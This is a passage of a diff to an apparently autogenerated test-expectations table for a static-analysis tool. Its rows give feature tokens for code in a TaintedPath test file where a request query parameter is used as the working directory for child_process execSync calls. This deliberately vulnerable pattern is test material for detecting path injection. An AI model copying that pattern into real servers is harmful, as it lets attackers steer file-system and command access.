+| autogenerated/TaintedPath/TaintedPath.js:210:5:210:10 | server | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:5:210:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:5:210:10 | server | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:5:215:2 | server ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:5:215:2 | server ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:5:215:2 | server ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:14:210:17 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:14:210:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:14:210:17 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:14:210:30 | http.createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:14:210:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:14:210:30 | http.createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:14:215:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:14:215:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:14:215:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:14:215:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:14:215:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:14:215:2 | http.cr ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:19:210:30 | createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:19:210:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:19:210:30 | createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | cp | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | cp | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | cp | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | cp | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | this | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | url | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:210:32:210:31 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | functio ... OT OK\\n} | calleeImports | http | @@ -6836,6 +66571,81 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | functio ... OT OK\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:210:32:215:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:41:210:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:41:210:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:41:210:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:210:41:210:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:41:210:43 | req | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:210:41:210:43 | req | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:210:41:210:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:210:41:210:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:210:41:210:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:41:210:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:210:46:210:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:46:210:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:210:46:210:48 | res | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:210:46:210:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:210:46:210:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:10 | path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:48 | path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:48 | path = ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:7:211:48 | path = ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:16 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:16 | url | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:16 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:22 | url.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:22 | url.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:37 | exceptional return of url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:37 | url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:37 | url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:43 | url.par ... ).query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:43 | url.par ... ).query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:48 | url.par ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:14:211:48 | url.par ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:18:211:22 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:18:211:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:18:211:22 | parse | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:18:211:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:18:211:22 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:24:211:26 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:24:211:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:24:211:26 | req | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:24:211:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:24:211:26 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:211:24:211:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:211:24:211:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:211:24:211:30 | req.url | calleeImports | url | @@ -6845,6 +66655,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:211:24:211:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:211:24:211:30 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:211:24:211:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:211:28:211:30 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:28:211:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:28:211:30 | url | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:28:211:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:28:211:30 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:211:33:211:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:211:33:211:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:211:33:211:36 | true | calleeImports | url | @@ -6854,6 +66669,41 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:211:33:211:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:211:33:211:36 | true | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:211:33:211:36 | true | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:211:39:211:43 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:39:211:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:39:211:43 | query | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:39:211:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:39:211:43 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:211:45:211:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:45:211:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:211:45:211:48 | path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:211:45:211:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:211:45:211:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:4 | cp | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:4 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:4 | cp | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:4 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:4 | cp | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:13 | cp.execSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:13 | cp.execSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:13 | cp.execSync | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:13 | cp.execSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:13 | cp.execSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:36 | cp.exec ... path}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:36 | cp.exec ... path}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:36 | cp.exec ... path}) | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:36 | cp.exec ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:36 | cp.exec ... path}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:36 | exceptional return of cp.exec ... path}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:36 | exceptional return of cp.exec ... path}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:36 | exceptional return of cp.exec ... path}) | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:36 | exceptional return of cp.exec ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:212:3:212:36 | exceptional return of cp.exec ... path}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:212:6:212:13 | execSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:6:212:13 | execSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:6:212:13 | execSync | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:212:6:212:13 | execSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:212:6:212:13 | execSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:212:15:212:22 | "foobar" | CalleeFlexibleAccessPath | cp.execSync | | autogenerated/TaintedPath/TaintedPath.js:212:15:212:22 | "foobar" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:212:15:212:22 | "foobar" | calleeImports | child_process | @@ -6872,6 +66722,21 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:212:25:212:35 | {cwd: path} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:212:25:212:35 | {cwd: path} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:212:25:212:35 | {cwd: path} | receiverName | cp | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:28 | cwd | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:28 | cwd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:28 | cwd | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:28 | cwd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:28 | cwd | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:34 | cwd: path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:34 | cwd: path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:34 | cwd: path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:34 | cwd: path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:34 | cwd: path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:34 | cwd: path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:34 | cwd: path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:34 | cwd: path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:34 | cwd: path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:212:26:212:34 | cwd: path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:212:31:212:34 | path | CalleeFlexibleAccessPath | cp.execSync | | autogenerated/TaintedPath/TaintedPath.js:212:31:212:34 | path | InputAccessPathFromCallee | 1.cwd | | autogenerated/TaintedPath/TaintedPath.js:212:31:212:34 | path | InputArgumentIndex | 1 | @@ -6882,6 +66747,31 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:212:31:212:34 | path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | | autogenerated/TaintedPath/TaintedPath.js:212:31:212:34 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:212:31:212:34 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:4 | cp | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:4 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:4 | cp | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| 